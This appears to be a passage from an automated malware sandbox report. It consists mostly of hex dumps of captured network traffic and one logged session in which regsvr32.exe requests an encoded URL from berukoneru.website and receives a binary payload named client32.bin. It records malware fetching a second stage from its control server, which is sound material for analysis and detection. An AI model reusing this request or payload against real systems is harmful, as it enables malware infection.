                        Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                        2021-12-14 09:34:07 UTC950INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                        Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                        2021-12-14 09:34:07 UTC966INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                        Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                        2021-12-14 09:34:07 UTC982INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                        Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                        2021-12-14 09:34:07 UTC998INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                        Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                        2021-12-14 09:34:07 UTC1014INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                        Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                        2021-12-14 09:34:07 UTC1030INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                        Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                        2021-12-14 09:34:07 UTC1046INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                        Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                        2021-12-14 09:34:07 UTC1062INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                        Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                        2021-12-14 09:34:07 UTC1078INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                        Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                        2021-12-14 09:34:07 UTC1094INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                        Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        5192.168.2.54980279.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-14 09:34:07 UTC1101OUTGET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:08 UTC1102INHTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:07 GMT
                        Content-Type: application/zip
                        Content-Length: 268426
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=hknqubagd3jvbvckr7p3s9hgo7; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:08 UTC1102INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                        Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                        2021-12-14 09:34:08 UTC1118INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                        Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                        2021-12-14 09:34:08 UTC1198INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                        Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                        2021-12-14 09:34:08 UTC1214INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                        Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                        2021-12-14 09:34:08 UTC1230INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                        Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                        2021-12-14 09:34:08 UTC1310INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                        Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                        2021-12-14 09:34:08 UTC1326INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                        Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                        2021-12-14 09:34:08 UTC1374INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                        Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                        2021-12-14 09:34:08 UTC1390INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc 